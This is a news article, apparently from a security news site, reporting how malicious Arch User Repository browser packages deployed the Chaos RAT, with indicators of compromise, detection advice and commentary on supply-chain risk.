Chaos RAT Infiltrates Arch Linux via Malicious AUR Packages
Share this article
Chaos RAT Exploits Arch Linux AUR in Supply Chain Attack
Arch Linux users are reeling from a targeted attack where malicious packages uploaded to the Arch User Repository (AUR) secretly deployed the Chaos RAT malware, compromising system security. Discovered and removed within 48 hours by vigilant community members and maintainers, this incident exposes the persistent risks in decentralized software distribution models.
The Attack Unfolded
On July 16, a user identified as "danikpapas" submitted three packages to the AUR:
- librewolf-fix-bin
- firefox-patch-bin
- zen-browser-patched-bin
These packages appeared legitimate—claiming to offer browser optimizations—but concealed a sinister payload. Each contained a PKGBUILD script referencing a GitHub repository (https://github.com/danikpapas/zenbrowser-patch.git) controlled by the attacker. During installation, the repository cloned malicious code that executed automatically, bypassing user scrutiny.
"These packages were installing a script coming from the same GitHub repository that was identified as a Remote Access Trojan (RAT)," warned the Arch Linux maintainers in their alert. "We strongly encourage users that may have installed one of these packages to remove them and ensure they were not compromised."
Inside the Chaos RAT Threat
The malware, identified as Chaos RAT, is an open-source tool capable of:
- Executing arbitrary commands
- Uploading/downloading files
- Establishing reverse shells
- Harvesting credentials
Infected systems repeatedly connected to a command-and-control (C2) server at 130.162.225.47:8080, granting attackers persistent access. Typically used in cryptomining or espionage campaigns, Chaos RAT transforms compromised devices into puppets for remote exploitation.
Detection involves checking for a rogue executable:
/tmp/systemd-initd
Affected users must terminate this process immediately.
Community Vigilance and Systemic Flaws
The attack was uncovered when a likely compromised Reddit account promoted the packages, sparking user suspicion. One member uploaded a sample to VirusTotal, confirming the Chaos RAT signature. This rapid crowd-sourced response contrasts sharply with the AUR's inherent vulnerability: unlike curated repositories, it lacks automated code reviews, placing the burden of security entirely on users.
This incident mirrors rising supply chain threats, where attackers poison trusted open-source channels to distribute malware. The ease of uploading unreviewed PKGBUILDs makes the AUR a prime target—echoing past issues like the npm and PyPI compromises.
Implications for Open Source Security
While Arch Linux acted swiftly, removing the packages by July 18, the breach underscores an industry-wide challenge. Community repositories thrive on trust but often lack safeguards against malicious actors. Developers must now scrutinize AUR installations more rigorously, employing tools like pacreview for manual PKGBUILD inspection. For maintainers, this event could accelerate demands for basic automated scanning or reputation systems to prevent recurrence.
As open-source ecosystems evolve, this attack serves as a sobering lesson: convenience in software distribution must not eclipse security. The next breach might not be caught so quickly, urging both users and platforms to fortify defenses in an era where one malicious commit can cascade into systemic failure.
Source: BleepingComputer